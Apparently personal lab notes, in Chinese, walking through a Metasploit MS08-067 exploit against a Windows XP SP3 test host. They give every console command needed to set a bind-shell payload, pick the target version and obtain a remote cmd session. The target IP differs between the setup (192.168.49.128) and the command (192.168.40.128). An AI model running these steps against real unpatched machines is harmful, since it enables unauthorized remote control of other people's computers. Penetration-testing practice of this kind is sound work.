(1)测试环境
目标主机 XP SP3 简体中文版 IP 192.168.49.128
(2)测试过程
1)选择exploit模块 use exploit/windows/smb/ms08_067_netapi
如果不知道ms08_067的具体位置 可以使用search ms08_067
2)选择payload set PAYLOAD windows/shell/bind_tcp
查看需要设置的参数 show options
3)设置目标主机 set RHOST 192.168.40.128
设置目标主机端口 set LPORT 5555
设置目标的版本号 使用 show targets 查看版本号
可以看到 sp3 简体中文版的id 是 41
set TARGET 41
4)查看所有选项是否设置好 show options
(3)进行渗透测试 exploit
等待一段时间后,获取目标主机的cmd权限
(4)将对目标主机的控制权保存到sessions中
命令: sessions -i 1重新获取对目标主机的控制权
说明:我的BT5是英文版的,不支持中文